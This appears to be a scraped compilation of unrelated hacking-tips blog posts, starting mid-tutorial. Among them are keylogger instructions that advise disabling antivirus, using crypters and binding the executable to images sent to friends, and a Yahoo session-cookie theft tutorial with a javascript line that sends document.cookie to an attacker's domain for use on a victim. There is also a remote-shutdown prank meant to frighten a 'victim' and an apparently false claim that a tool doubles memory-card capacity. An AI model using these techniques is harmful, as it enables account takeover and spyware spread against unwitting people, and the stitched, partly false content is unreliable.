Browser Hijacking: What It Is and How to Avoid It

Browser hijacking is a malicious code that changes your browser settings without your consent. The code is created by computer programmers with malicious intent, and is capable of anything from altering the home page of your browser to changing your list of favorites to include websites that contain questionable content. A browser hijacker can also block access to Web pages that offer antivirus software to prevent you from downloading it and uninstalling the hijacker's code.

The malicious code that is created to hijack your Web browser also creates registry changes to your computer's operating system which makes it difficult to change the browser settings back to their original state.

How Browser Hijacking Works

§ ActiveX Scripts: ActiveX scripts are applications that usually run directly from a Web page and automatically request permission from the user to install via a pop-up window. It is very easy for the user to accidentally click on an ActiveX download. Browser hijackers take advantage of this by installing malware into the ActiveX application which downloads itself into your browser and changes your browser settings.

§ Internet Explorer Security Holes: Browser hijackers also use Internet Explorer security holes to install browser hijacking software. This can be accomplished with or without interaction from the user.

HOSTS File: Browser hijackers use the HOSTS file on your PCs operating system to install an entry that connects Web URL addresses to your IP address. Whenever you try to access a specific website, it will hijack you to a porn or phishing website or any other site with questionable content.

How to Avoid Browser Hijacking

Avoiding browser hijacking is not complicated. If you remain aware and take a few simple preventative measures you can avoid this type of attack on your PC and your browser.

Update Your Antivirus Program: Keep your antivirus program updated. Although this seems like common sense, you would be surprised how many people have an antivirus program installed but fail to update it on a regular basis. Also, make sure your antivirus program is set to make periodic scans and check for updates on a regular basis.

Use Internet Explorer Security Settings: There is a variety of Internet Explorer security settings preinstalled on your browser. Most of the time these are set to a default setting that does not provide the highest security protection. Reset the security settings to block automatic pop-ups and other activity that can invite malware into your browser.

Use a Different Browser: Internet Explorer is one of the most popular browsers which is why hijackers target it the most. Try using a different browser such as Mozilla or Netscape.

Browse the Internet with Caution: Always be on the lookout for suspicious activity on the Internet. If something does not feel or look right, don't click. Also make a habit of only surfing the websites you trust the most.

3.Now compile the program using Ctrl+f9.

4. Now see the location where you saved the program file. There an additional file is created automatically with same name and having extension as .exe .

5. Double click on that . exe file .

6. And now everything is done , in the same location the program will generate a “Log.txt” file , where all the logs of computers are stored.

7. Just after copiling the program , the antivirus(if active) will give you alert message “SPYWARE” , so better is that you should turnoff your antivirus .

8. To prevent from antiviruses there are various available “Crypters” You can also bind the .exe file with image or any files and send it to your friend.

If you have physical access to your college/school system,then copy the exe file in that system and run it.
This was just a simple keylogger , soon I will post about more efficient keylogger with Program code.

A really shocking news for me , when i heard that Terrorists in the attack of 9/11 used "STEGANOGRAPY" for communication , scanners in the World Trade Center couldn't identify this method before the attack , but it was discovered in the post investigation of the attack.

I intentionally have no wrong purpose while writing the post , i am writing this only for educational purpose , if some people can use this type of tricks for a big threat to societies , then why can't we use these methods to prevent ourselves or to protect the society ?? This question always arise in my mind ,
we have to discover something new to give a strong slap to these people .

So now i should move to the main technical stuff.

Steganography is art and science of hiding facts behind a false or useless but interesting element. In this process no one other than the sender and the and the recipient can view this. Cryptography is combined with steganography just for the reason that, if also the message is discovered it cannot be read. The main difference lies in the existence of cryptography and steganography

In Cryptography one can know that a message is encrypted. But in Steganography one cannot know or observe about it simply because its hidden behind an image, video or an audio etc… which without keen observation might go without any suspicion.

Following is the trick how to use it.

Open Command Prompt or Go to Start > Run, type cmd.
Now type copy /B original.jpg + archive.rar new.jpg

In the above command Original.jpg is any image in which we are going to embed archive.rar file.

original.jpg new.jpg

If you open new.jpg with some picture viewer it will be a normal image, but when you open it with WinRAR for example it`ll show you the contents of archive.rar. It will also work with different types of files.

Jelly Bean (Android 4.1)

We often encounter with a picture during a registeration on a secured website which is a text written in modified form or underlined or designed in such a way that it can be easily understandable only by humans. It is generally called CAPTCHA(Completely Automated Public Turing Test To Tell Computers And Humans Apart).As Shown in the Image Below...

CAPTCHAs are used in attempts to prevent automated software from performing actions which degrade the quality of service of a given system, whether due to abuse or resource expenditure. CAPTCHAs can be
deployed to protect systems vulnerable to e-mail spam, such as the webmail services of Gmail, Hotmail, and Yahoo! Mail.

But,
An alarming number of CAPTCHAs schemes are vulnerable to automated attacks.

So After deep Research, Security Experts gave rise to CAPTCHA cracking tool called TesserCap.

TesserCap is a OCR(Optical Character Recognition) engine.
It is a GUI based, point and shoot CAPTCHA analysis tool with the following features:

A generic image preprocessing engine that can be configured as per the CAPTCHA type being analyzed.
Tesseract-OCR as its OCR engine to retrieve text from preprocessed CAPTCHAs.
Web proxy support
Support for custom HTTP headers to retrieve CAPTCHAs from websites that require cookies or special HTTP headers in requests
CAPTCHA statistical analysis support
Character set selection for the OCR Engine.

To be a hacker its my duty to introduce you to the Top 10 Hackers in 2012. These hackers are being so strong as they can hack anything. They are certified as well as trained. Most of them are now working as on job of Security Experts from high companies due to their skills. So lets see who's on top and leading the race!

Top Ten Hackers of all Time:

1. Gary McKinnon

Garry is considered as one of the best hackers of all time. USA declared him as the biggest military computer hacker ever. He whacked the security system of NASA and Pentagon. This made him one of the great black hat hacker celebrities and got his name into the hacker's community. The nerd is now facing 70 years of imprisonment and is deprived from accessing internet. He has illegally accessed 97 computers and has caused around $700,000 damage to the economy.

2. Robert Tappan Morris

He is the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act. Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500. Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory.

3. Jonathan James

Jonathan James is better known as comrade and he was the first teenager to be held captive for computer hacking when he was only sixteen years old. When he was accused of hacking several websites he said that he was actually having a look and fooling around and that what he found really interesting was the challenge to see what he could do.

4. Kevin Mitnick

Kevin started with his minor cyber crimes when he was twelve years old. The first thing he did was hack the Los Angeles Bus system in order to get free bus tickets. After that he continued his hacking career by damaging the FBI, DEC, IBM, Motorola, Nokia, Sun Microsystems and Siemens. He was sent to prison for five years and eight months and when he was freed he decided to set up Mitnick Security, which is a safety consultancy company that offers its services for multinational firms.

5. Raphael Gray

He hacked the computer systems around the world in over six weeks. He was 19 years when he performed the hacking. His mission was to make a multi- million pound credit card. He published about 6,500 credit cards as an example of weak security in the consumer websites.

6. Mark Abene

Most people wouldn’t know who Mark Abene because he is more famous for his nickname Phiber Optik. He was the one who created the Master of Deception group. He had a passion for creating computer programs and he was always trying to learn new things, which made him access controversial sites. He is world famous because he is the ultimate computer hacking acts in the world.

7. Vladimir Levin

He was a high-profile cyberpunk back in the days. He graduated from St. Petersburg Teknologichesky University and was able to hack Citibank from New York and send more than ten million dollars to several of his accounts not only in the United States but also in Europe and in Israel. A real computer hacker.

8. Kevin Poulsen

Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, (taing over all of the station’s phone lines) which earned him a brand new Porsche, among other items. Law enforcement dubbed him “the Hannibal Lecter of computer crime.”Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.His hacking specialty, however, revolved around

telephones. Poulsen’s most famous hack, In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.

9. Onel A. de Guzman

He is one of the best international hacker of all time and a Filipino computer student as well.

During his time period, he creates a “Love Bug” virus that crippled computer e-mail systems worldwide.

10. Adrian Lamo

The threat analyst and grey hat hacker broke into various high profile computers like New York Times, yahoo and Microsoft that lead to his arrest in the year 2003. He used his internet connections at libraries and coffee shops. The black hat hacker was sentenced to six month home confinement and two years of probation and two years of probation which is expired on January 16, 2007. Now he a great public speaker and a award winning journalist.

What are session IDs or session cookies ?

Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out' , session gets destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.

3. Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.

Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Many of my friends are busy in downloading movies in many formats such as avi,mp4,flv,mkv, etc...

But these converted formats have a problem. The audio and video sync cannot be correct in all videos. In many videos, soundtrack may lead over video track or vice-versa. But these problems are identified by media player coders and they attach an option to fix desynchronization of video.

All you have to do is play your media file in VLC media player or Media Player Classic and identify shift direction. Then you will be able to adjust the audio shift.

How to fix audio sync using VLC media player

Steps to fix :-

1. Play your file in VLC and identify the shift of sundtrack.
2. Click tools>Preferences, Select "show settings" from simple to all
3. click audio on the left, locate audio desynchronization compensation field
4. Enter shift value in milliseconds. If you feel one second shift then input 1000 or -1000
acoording to shift direction.
5. click ok and play file.
6. you can use keyboard shortcuts J and K to adjust audio sync.

How to fix audio sync using Media Player Classic

Steps to fix :-

1. open file in MPC
2. click view>options, select audio switcher from left

Hello guys , again back after a long time , u know well about blooddy exmss .

Today I will Give You a small trick regarding “Folder Hiding”. We all have some private Data (U all know whats dat :-P) in our Laptop/PC that we don’t want to show to others , for this we use the “HIDE” property of that folder/file ,which is given as default options in windows , But this folder will be shown by default windows search .

So what would you do to protect this data ??

We can hide the folder permanently , just follow these simple steps.

Ø Press Windows+R (Run box will appear)

Ø Type cmd and hit enter

Ø Command Prompt screen will appear

Ø Type “attrib +s +h d:\games” (without inverted commas)

(this folder must exist here) and hit enter ,

Ø You are done , the folder is permanently hide , windows can’t find it by its default search even.

Ø To Recover this folder type “attrib –s –h d:\games”…….hit enter

Hello friends......!! Today i am here with a cool trick. You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these steps :-

Step 1: Before going to start clear all history, all cookies, stop all downloading and close all extra tabs. Mean to say stop all internet activities. Now go to your messanger and start chating with the victim.

Step 2: Go the start and click on run.

Step 3: In run command type cmd.exe and hit enter.

Step 4: A black screen will appear. This is command prompt. In this box type "netstat -n" (without quotes).

Step 5: Now if you done the step one correctly you see only one ip address many times (ip should be of victim).

Step 6: Now again, type "shutdown -i"(without quotes).A box will appear now click on add button.A small box will pop up. Now type ip address of computer which you get from "netstat -n" command.

Step 7: Now there are three options click on shutdown.

Step 8: To show a message to victim's computer check the "warm users of the action" and set the number of seconds.

Step 9: Now select any option in shutdown event tracker.

Step 10: Now comes the best part of the prank. In last type your message like you got hacked and we destroy your computer. After this shutdown your computer is not going to start(type anything that scare your victim). Now click on ok and you are done. Have fun guys and must leave comment below.

1) Using notepad as diary

§ Open notepad

§ Type “.LOG” without quotes

§ Save it with any name

§ That’s all :P

2) Wanna do some mischief thing

§ Download rar file from here

§ Extract the hello.vbs

§ double click on it

§ notepad will start writing on its own

§ if you want to add you own words edit the file using note pad and replace the existing letters

§ That’s all :D

3) Hiding text in a notepad

§ Open cmd, go to the path where you want to save your text file.

Like if you want to save in D Drive so I wrote d: in cmd

§ Enter the command notepad hack.txt:hacked (hack.txt is the name of the file)

§ A prompt window will ask for creating a new file, press yes & write text whatever you want.

§ Save it by using ctrl+s

§ You have created a file with name in D drive

§ Open the file it won’t show any thing.

§ For showing the text again, write same command again in DOS as notepad hack.txt:hacked

Convert Your 1Gb Memory Card To 2Gb

Procedure:

11) First of all we have to make sure that its a 1 GB memory card. This only works on 1GB And it supports only in some of the rare cases of memory cards.

2)Now Backup all your data in that because we have to format the drive.

3) After backing up now open the Skimedi Fix 2GB Capacity application. i will upload a link at the end of post.
4) A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located (generally G: or L: drive for USB sticks)

5) Please select the drive u want to change, the size. Then press FIX it will ask u to allow the drive to be formatted.

6) Later it will ask to replug the device. Just replug the memory stick card and put it back. The size of the memory will be increased from 1Gb to 2Gb. you can see the properties before and after the cracking process.

7)After that you can also check the memory size in phone and also you can test the size by copying all the data to it which is around 2Gb.

2. Browse C: (or your Operating system drive)

3. Browse Windows –>System32–>drivers–>etc

so the Location will be C:\WINDOWS\system32\drivers\etc

In the etc folder look for the file hosts

4. Open this file hosts with notepad.

5. Locate the line 127.0.0.1 localhost

6. To block www.google.com for example, just add this text under

127.0.0.1 localhost:

127.0.0.1 www.google.com

127.0.0.1 www.yahoo.com

7. Save the file.

In this way add any number of sites you want, however you will need to prefix it with “127.0.0.1″.

Note: This blocks the website from opening in any browser whether it is Mozilla Firefox or Internet Explorer

Convert any Folder into almost anything

Following is a method by which u can convert any folder into either Control Panel, Recycle Bin, My Computer or Internet Explorer.

This is done by adding their respective registry keys to the folder’s name. After this when you’ll double click on the folder, either Control Panel, Recycle Bin, My Computer or Internet Explorer will open according to your choice. Actually that folder is then treated by Windows as a link to any of these four. The folder will remain intact with all its data and no one can access that folder via Windows. It can only be accessed via Command Prompt or some third party app.

To Convert Folder Into Contol Panel, Rename With Adding
.{21EC2020-3AEA-1069-A2DD-08002B30309D}

To Convert Folder Into Recycle Bin, Rename With Adding
.{645FF040-5081-101B-9F08-00AA002F954E}

To Convert Folder Into My Computer, Rename With Adding

To Convert Folder Into Internet Explorer, Rename With Adding

Eg:- If you have a folder ABC, to convert it into Control Panel, rename the folder as
ABC.{21EC2020-3AEA-1069-A2DD-08002B30309D}

After this, the key should disappear and act as an attribute. And if it doesn’t, then also no problem, as the folder will start working the way you want it to.

To re-enable your folder to be accessible via Windows, go to command prompt and rename the folder there. Eg:- If the folder is in C:TempABC, then get to C:Temp in the command prompt and type:
ren ABC.{21EC2020-3AEA-1069-A2DD-08002B30309D} ABC

(Command Prompt supports CLIPBOARD. Copy-Paste will work there.)

Your folder will be back to normal state.

This method can be used to protect any data, but it will not provide reliable security to the data.

You can also search the registry for more relevant keys like these.

Hide your HDD partitions

STEP 1 à Go to Start > run > type “diskpart”.
A dos window will appear with following like that
DISKPART>

STEP 2 à Then type “list volume” without quote
It will look like this.

STEP 3 à If u want to hide drive E then type “select volume 3″ without quote

then a message will appear in same winwods { Volume 3 is the selected volume}

STEP 4 à Now type ” remove letter E” without quote
now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .

Diskpart will remove the letter .Windows 7 is not having capabilty to identify the unkown volume.

Don’t afraid ur Data will ramin same .

To Come back the Drive repeat the process . but in 4th step which is shown in this post

replace ” remove”to “assign”
means type ” assign letter E” without quote

The above method won’t work for the drive containing Operating System

and it can also be done using System Manager>Storage Manager
